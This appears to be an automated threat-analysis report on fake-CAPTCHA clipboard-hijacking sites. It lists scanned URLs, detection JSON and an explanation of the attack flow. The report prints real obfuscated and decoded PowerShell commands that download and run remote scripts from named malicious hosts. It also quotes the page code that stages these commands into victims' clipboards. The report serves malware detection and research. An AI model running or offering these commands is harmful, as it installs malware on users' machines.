"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://www.test.peperoncinochepassione.it/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://www.test.peperoncinochepassione.it/",
"Timestamp": "2025-04-18 16:38:19",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=",
"Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://mail.cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://browser.certif-update.website/ |
| URL | https://browser.certif-update.website/ |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://mail.cambodiatouristservice.com/",
"Timestamp": "2025-04-18 16:38:20",
"Urls": [
"https://browser.certif-update.website/",
"https://browser.certif-update.website/"
]
}
https://www.ningbocrm.jintsume.net/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://www.ningbocrm.jintsume.net/",
"Timestamp": "2025-04-18 16:38:20",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://my.salviatech.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://my.salviatech.com/",
"Timestamp": "2025-04-18 16:38:21",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=",
"Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
http://82.146.62.232/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "http://82.146.62.232/",
"Timestamp": "2025-04-18 16:38:22",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
http://101.32.40.22/
Total findings: 4
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "http://101.32.40.22/",
"Timestamp": "2025-04-18 16:38:22",
"Urls": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/"
],
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..."
]
}
https://staplebrokenmetaliyro.blogspot.com/
Total findings: 46
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://staplebrokenmetaliyro.blogspot.com/",
"Timestamp": "2025-04-18 16:38:22",
"Urls": [
"http://www.w3.org/1999/xhtml",
"http://www.google.com/2005/gml/b",
"http://www.google.com/2005/gml/data",
"http://www.google.com/2005/gml/expr",
"https://electricreport.org/ygd4g",
"https://staplebrokenmetaliyro.blogspot.com/favicon.ico",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt=rss",
"https://www.blogger.com/feeds/3967763303726818370/posts/default",
"https://www.blogger.com/profile/02686294779557843862",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://www.blogblog.com/indie/mspin_black_large.svg",
"https://www.blogblog.com/indie/mspin_white_large.svg",
"https://themes.googleusercontent.com/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw",
"http://www.offset.com/photos/394244",
"https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js",
"http://www.w3.org/1999/xlink",
"http://www.w3.org/1999/xlink",
"https://staplebrokenmetaliyro.blogspot.com/search",
"https://www.blogger.com",
"http://www.w3.org/1999/xlink",
"http://www.offset.com/photos/394244",
"http://www.w3.org/1999/xlink",
"https://www.blogger.com/profile/02686294779557843862",
"http://www.w3.org/1999/xlink",
"https://www.blogger.com/profile/02686294779557843862",
"https://www.blogger.com/profile/02686294779557843862",
"https://www.blogger.com/go/report-abuse",
"https://resources.blogblog.com/blogblog/data/res/2796432393-indie_compiled.js",
"https://www.blogger.com/static/v1/widgets/2218197725-widgets.js",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/search",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/favicon.ico",
"https://www.blogger.com",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\\x22",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt\\x3drss\\x22",
"https://www.blogger.com/feeds/3967763303726818370/posts/default\\x22",
"https://www.blogger.com/profile/02686294779557843862\\x22",
"https://apis.google.com/js/platform.js",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://www.blogger.com/static/v1/jsbin/709570948-lbx.js",
"https://www.blogger.com/static/v1/v-css/3681588378-lightbox_bundle.css"
],
"ClipboardManipulation": "...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos..."
}
Technical Analysis
ClickGrab Threat Analysis Report - 2025-04-18
Most Common External Domains
- www.google.com: 38 occurrences
- use.fontawesome.com: 27 occurrences
- cdnjs.cloudflare.com: 23 occurrences
- staplebrokenmetaliyro.blogspot.com: 15 occurrences
- www.blogger.com: 13 occurrences
- www.webgo.de: 10 occurrences
- t.me: 7 occurrences
- www.w3.org: 6 occurrences
- browser.certif-update.website: 4 occurrences
- www.blogblog.com: 2 occurrences
Common Pattern Analysis
reCAPTCHA imagery (27 occurrences, 1 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (27 times)
Font resources (50 occurrences, 2 distinct URLs)
- https://use.fontawesome.com/releases/v5.0.0/css/all.css (27 times)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (23 times)
CDN hosted scripts (24 occurrences, 2 distinct URLs)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (23 times)
- https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
Google resources (40 occurrences, 8 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (27 times)
- https://www.google.com/intl/en/policies/privacy/ (4 times)
- https://www.google.com/intl/en/policies/terms/ (4 times)
- http://www.google.com/2005/gml/b (1 times)
- http://www.google.com/2005/gml/data (1 times)
- ...and 3 more distinct URLs
JavaScript Clipboard Analysis
Found clipboard manipulation code snippets in 54 places
document.execCommand copy
Found in 54 snippets (100.0% of clipboard code)
Examples:
document.execCommand("copy")
textarea manipulation
Found in 54 snippets (100.0% of clipboard code)
Command Context Analysis
Found 35 PowerShell download context snippets
stageClipboard Function
Found 23 references to stageClipboard function
Example stageClipboard contexts:
Example 1:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 2:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 3:
...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Malicious Commands
Found 6 commandToRun declarations
Malicious commands being prepared for clipboard:
Example 1:
Command:
powershell
Context:
WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
Example 2:
Command:
powershell
Context:
WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
Example 3:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 4:
Command:
powershell
Context:
...idden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 5:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
PowerShell Parameters
Found 7 htaPath declarations
Malicious PowerShell parameters:
Example 1:
Parameters:
-NoP -WindowStyle Hidden -Command \
Context:
...).textContent = verification_id; const htaPath = "-NoP -WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\"";...
Example 2:
Parameters:
-NoP -WindowStyle Hidden -Command \
Context:
...).textContent = verification_id; const htaPath = "-NoP -WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
Example 3:
Parameters:
-w hidden -c \
Context:
...d').textContent = verification_id; const htaPath = "-w hidden -c \"Start-Process powershell -ArgumentList '-w hidden -c iwr htt...
Example 4:
Parameters:
-w hidden -c \
Context:
...d; const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaP
Example 5:
Parameters:
-w hidden -c \
Context:
...const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
Clipboard Attack Pattern Analysis
Based on the data analyzed, here's the complete clipboard attack pattern:
1. Initial Victim Engagement
Victim is shown a fake CAPTCHA verification UI with Google reCAPTCHA branding
Common elements found: - Google reCAPTCHA logo image - Font resources from CDNs - "I am not a robot" checkbox
2. Malicious Code Preparation
When user clicks the verification checkbox:
- A 'commandToRun' variable is set with a malicious PowerShell command
- The command is typically obfuscated and often downloads second-stage payloads
- Common download destinations include:
Example Command Preparation Code:
WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
3. Clipboard Hijacking
The malicious command is copied to the user's clipboard:
- A temporary textarea element is created
- The command is combined with verification text like "[CHECKMARK] I am not a robot"
- document.execCommand("copy") is used to copy to clipboard
- The temporary element is removed from the DOM
4. Social Engineering Component
User sees a success message:
- The verification UI shows success with a checkmark symbol
- User is told they've passed verification
- The clipboard now contains the malicious command + verification text
5. Attack Objective
Final stage of the attack:
- When user pastes the clipboard contents elsewhere (like in terminal)
- They see what looks like verification text
- But the PowerShell command at the start gets executed
- This downloads and runs additional malware from attacker-controlled servers
Reconstructed Attack Example
What's copied to clipboard:
powershell # [CHECKMARK] 'I am not a robot - reCAPTCHA Verification Hash: XY12Z345'
What user sees when pasting: A verification success message
What actually happens: PowerShell executes the hidden malicious command
Conclusion
This is a sophisticated social engineering attack that tricks users into:
- Thinking they're completing a legitimate CAPTCHA
- Unknowingly copying malicious code to their clipboard
- Executing malware when they paste what they think is just verification text
Statistics
- Total sites analyzed: 40
- Sites with malicious content: 27
- Total unique domains: 19
- Total URLs extracted: 155